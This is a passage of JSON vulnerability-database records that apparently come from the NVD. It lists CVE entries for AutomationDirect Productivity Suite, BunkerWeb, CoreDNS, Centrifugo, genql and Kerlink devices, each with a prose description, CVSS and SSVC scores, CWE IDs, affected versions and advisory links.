Suite","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"v4.6.2.2","versionType":"custom","status":"affected"},{"version":"v4.7.0.47","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.0,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.0,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:24:44.620879Z","id":"CVE-2026-60063","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-787"}]}],"references":[{"url":"https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-197-04.json","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.automationdirect.com/support/software-downloads","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.cisa.gov/news-events/ics-advisories/icsa-26-197-04","source":"ics-cert@hq.dhs.gov"}]}},{"cve":{"id":"CVE-2026-60140","sourceIdentifier":"ics-cert@hq.dhs.gov","published":"2026-07-16T20:16:46.110","lastModified":"2026-07-17T18:31:44.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"An out-of-bounds read vulnerability in the Productivity Suite allows a \nlocal attacker to trigger kernel memory corruption by sending a crafted \nIOCTL request. This can lead to exposing sensitive information or \ncausing the affected product to become unstable or unavailable."}],"affected":[{"source":"ics-cert@hq.dhs.gov","affectedData":[{"vendor":"AutomationDirect","product":"Productivity Suite","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"v4.6.2.2","versionType":"custom","status":"affected"},{"version":"v4.7.0.47","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"LOW","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.8,"impactScore":4.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:45:07.449182Z","id":"CVE-2026-60140","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-125"}]}],"references":[{"url":"https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-197-04.json","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.automationdirect.com/support/software-downloads","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.cisa.gov/news-events/ics-advisories/icsa-26-197-04","source":"ics-cert@hq.dhs.gov"}]}},{"cve":{"id":"CVE-2026-61389","sourceIdentifier":"ics-cert@hq.dhs.gov","published":"2026-07-16T20:16:46.270","lastModified":"2026-07-17T18:31:44.140","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"An out-of-bounds write vulnerability in the Productivity Suite allows a \nlocal attacker to trigger kernel memory corruption via a crafted IOCTL \nrequest, potentially resulting in privilege escalation or system \ninstability."}],"affected":[{"source":"ics-cert@hq.dhs.gov","affectedData":[{"vendor":"AutomationDirect","product":"Productivity Suite","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"v4.6.2.2","versionType":"custom","status":"affected"},{"version":"v4.7.0.47","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":7.0,"baseSeverity":"HIGH","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":1.0,"impactScore":5.9}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:45:43.767213Z","id":"CVE-2026-61389","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"ics-cert@hq.dhs.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-787"}]}],"references":[{"url":"https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-197-04.json","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.automationdirect.com/support/software-downloads","source":"ics-cert@hq.dhs.gov"},{"url":"https://www.cisa.gov/news-events/ics-advisories/icsa-26-197-04","source":"ics-cert@hq.dhs.gov"}]}},{"cve":{"id":"CVE-2026-61718","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T20:16:46.420","lastModified":"2026-07-17T19:17:17.670","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"bunkerweb is an Open-source and next-generation Web Application Firewall (WAF). From 1.6.2 until 1.6.12, the BunkerWeb web UI BiscuitMiddleware authorization bypass list included the /cache/ URL prefix, so routes in src/ui/app/routes/cache.py protected only by @login_required, including POST /cache/delete, allowed low-privilege read-only reader accounts to permanently delete job cache files containing blacklist, greylist, DNSBL, CrowdSec, GeoIP, ModSecurity CRS, Let's Encrypt, ACME, and custom configuration data. This issue is fixed in version 1.6.12."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"bunkerity","product":"bunkerweb","versions":[{"version":">= 1.6.2, < 1.6.12","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":2.5}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:13:28.547380Z","id":"CVE-2026-61718","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-285"},{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/bunkerity/bunkerweb/commit/685ccbbe7d204132a843a7b7fd802d1bdb3f20a9","source":"security-advisories@github.com"},{"url":"https://github.com/bunkerity/bunkerweb/releases/tag/v1.6.12","source":"security-advisories@github.com"},{"url":"https://github.com/bunkerity/bunkerweb/security/advisories/GHSA-q7rm-935c-v39g","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-62299","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T20:16:46.693","lastModified":"2026-07-17T19:17:18.770","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"CoreDNS is a DNS server written in Go. Prior to 1.14.5, the CoreDNS rewrite plugin supports edns0 rewrite rules with an optional revert flag, and two response rules, edns0SetResponseRule and edns0ReplaceResponseRule[T] in plugin/rewrite/edns0.go, call res.IsEdns0() and immediately dereference the returned *dns.OPT without a nil check when a downstream plugin returns a response with no OPT record. A remote, unauthenticated client can send a single ordinary DNS query matching a rewrite edns0 <local|nsid|subnet> <set|append|replace> ... revert rule, causing ResponseReverter in plugin/rewrite/reverter.go to panic, return SERVFAIL, and degrade availability, or crash the CoreDNS process if the debug directive disables recovery. This issue is fixed in version 1.14.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"coredns","product":"coredns","versions":[{"version":"< 1.14.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":3.9,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:11:18.131765Z","id":"CVE-2026-62299","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-476"}]}],"references":[{"url":"https://github.com/coredns/coredns/commit/fc447d0658b093edc8cd29a6b171216a44a644c2","source":"security-advisories@github.com"},{"url":"https://github.com/coredns/coredns/pull/8190","source":"security-advisories@github.com"},{"url":"https://github.com/coredns/coredns/releases/tag/v1.14.5","source":"security-advisories@github.com"},{"url":"https://github.com/coredns/coredns/security/advisories/GHSA-9pmm-cxww-rrr7","source":"security-advisories@github.com"},{"url":"https://github.com/coredns/coredns/security/advisories/GHSA-9pmm-cxww-rrr7","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-62963","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T20:16:47.533","lastModified":"2026-07-17T18:44:13.257","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Centrifugo is an open-source scalable real-time messaging server. Prior to 6.8.4, Centrifugo unidirectional WebSocket transport with uni_websocket.compression enabled enforced uni_websocket.message_size_limit against compressed wire-frame length in internal/websocket/conn.go advanceFrame, but ReadMessage used io.ReadAll after decompression without an output cap, allowing unauthenticated requests to /connection/uni_websocket to trigger large memory and CPU consumption. This issue is fixed in version 6.8.4."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"centrifugal","product":"centrifugo","versions":[{"version":"< 6.8.4","status":"affected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":8.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:46:33.672302Z","id":"CVE-2026-62963","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-409"}]}],"references":[{"url":"https://github.com/centrifugal/centrifugo/commit/46d40e4ac3a5446c9745f8b219197166ae12a6e5","source":"security-advisories@github.com"},{"url":"https://github.com/centrifugal/centrifugo/pull/1162","source":"security-advisories@github.com"},{"url":"https://github.com/centrifugal/centrifugo/releases/tag/v6.8.4","source":"security-advisories@github.com"},{"url":"https://github.com/centrifugal/centrifugo/security/advisories/GHSA-q6mr-3g59-5m8x","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-62994","sourceIdentifier":"security-advisories@github.com","published":"2026-07-16T20:16:47.657","lastModified":"2026-07-17T18:33:49.403","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"CoreDNS is a DNS server written in Go. From 1.9.4 until 1.14.5, a network DNS client allowed to request AXFR for a CoreDNS zone can trigger a panic when CoreDNS is configured with k8s_external headless-service zone transfers and Kubernetes contains a headless service endpoint with no declared ports; plugin/kubernetes/object/endpoint.go creates Port: -1, plugin/k8s_external/msg_to_dns.go skips that service, plugin/k8s_external/transfer.go sends an empty []dns.RR batch, and plugin/transfer/transfer.go indexes records[0] without checking the batch is non-empty. This issue is fixed in version 1.14.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"coredns","product":"coredns","versions":[{"version":">= 1.9.4, < 1.14.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","baseScore":3.7,"baseSeverity":"LOW","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"LOW"},"exploitabilityScore":2.2,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T11:12:32.909197Z","id":"CVE-2026-62994","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-248"},{"lang":"en","value":"CWE-755"}]}],"references":[{"url":"https://github.com/coredns/coredns/commit/ab318db7b4a3a19273852ed627f54888198c8efb","source":"security-advisories@github.com"},{"url":"https://github.com/coredns/coredns/pull/8207","source":"security-advisories@github.com"},{"url":"https://github.com/coredns/coredns/releases/tag/v1.14.5","source":"security-advisories@github.com"},{"url":"https://github.com/coredns/coredns/security/advisories/GHSA-74w3-63xv-x9mv","source":"security-advisories@github.com"},{"url":"https://github.com/coredns/coredns/security/advisories/GHSA-74w3-63xv-x9mv","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-63397","sourceIdentifier":"9119a7d8-5eab-497f-8521-727c672e3725","published":"2026-07-16T20:16:47.950","lastModified":"2026-07-17T18:08:21.497","vulnStatus":"Awaiting Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"remorses/genql before version 6.3.4 allows an authenticated attacker with control of the GraphQL schema that is passed to genql to inject arbitrary JavaScript or TypeScript. The malicious code is injected into the generated schema.ts file and executes when the genql client is bundled and imported."}],"affected":[{"source":"9119a7d8-5eab-497f-8521-727c672e3725","affectedData":[{"vendor":"remorses","product":"genql","defaultStatus":"affected","versions":[{"version":"0","lessThan":"6.3.4","versionType":"custom","status":"affected"},{"version":"6.3.4","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"9119a7d8-5eab-497f-8521-727c672e3725","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"HIGH","userInteraction":"ACTIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"9119a7d8-5eab-497f-8521-727c672e3725","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H","baseScore":6.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"HIGH","privilegesRequired":"HIGH","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":0.5,"impactScore":5.9}],"ssvcV203":[{"source":"9119a7d8-5eab-497f-8521-727c672e3725","ssvcData":{"timestamp":"2026-07-14T17:29:12.507919Z","id":"CVE-2026-63397","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"9119a7d8-5eab-497f-8521-727c672e3725","type":"Secondary","description":[{"lang":"en","value":"CWE-116"}]}],"references":[{"url":"https://github.com/remorses/genql","source":"9119a7d8-5eab-497f-8521-727c672e3725"},{"url":"https://github.com/remorses/genql/releases/tag/%40genql%2Fcli%406.3.4","source":"9119a7d8-5eab-497f-8521-727c672e3725"},{"url":"https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2026/va-26-197-01.json","source":"9119a7d8-5eab-497f-8521-727c672e3725"},{"url":"https://www.cve.org/CVERecord?id=CVE-2026-63397","source":"9119a7d8-5eab-497f-8521-727c672e3725"}]}},{"cve":{"id":"CVE-2024-32385","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T21:17:17.510","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue in Kerlink Kerlink Wirnet iStation 868 KerOS v.4.3.3_20200803132042 allows a remote attacker to obtain sensitive information via a boardID and revisionID components"}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:34:03.268732Z","id":"CVE-2024-32385","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-200"}]}],"references":[{"url":"https://www.bdosecurity.de/de-de/advisories/cve-2024-32385","source":"cve@mitre.org"},{"url":"https://www.kerlink.com/","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2024-32386","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T21:17:18.547","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"Directory traversal vulnerability in Kerlink Kerlink Wirnet iStation 868 KerOS v.4.3.3_20200803132042 allows a remote attacker to obtain sensitive information via the SNMP update mechanism."}],"affected":[{"source":"cve@mitre.org","affectedData":[{"vendor":"n/a","product":"n/a","versions":[{"version":"n/a","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"cve@mitre.org","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N","baseScore":7.3,"baseSeverity":"HIGH","attackVector":"ADJACENT_NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.1,"impactScore":5.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:40:45.527421Z","id":"CVE-2024-32386","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"total"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"https://www.bdosecurity.de/de-de/advisories/cve-2024-32386","source":"cve@mitre.org"},{"url":"https://www.kerlink.com/","source":"cve@mitre.org"}]}},{"cve":{"id":"CVE-2024-32387","sourceIdentifier":"cve@mitre.org","published":"2026-07-16T21:17:18.670","lastModified":"2026-07-17T18:11:59.263","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"An issue in Kerlink Kerlink Wirnet iStation 868 KerOS v.4.3.3_20200803132042 allows a remote attacker to obtain sensitive information via the community string 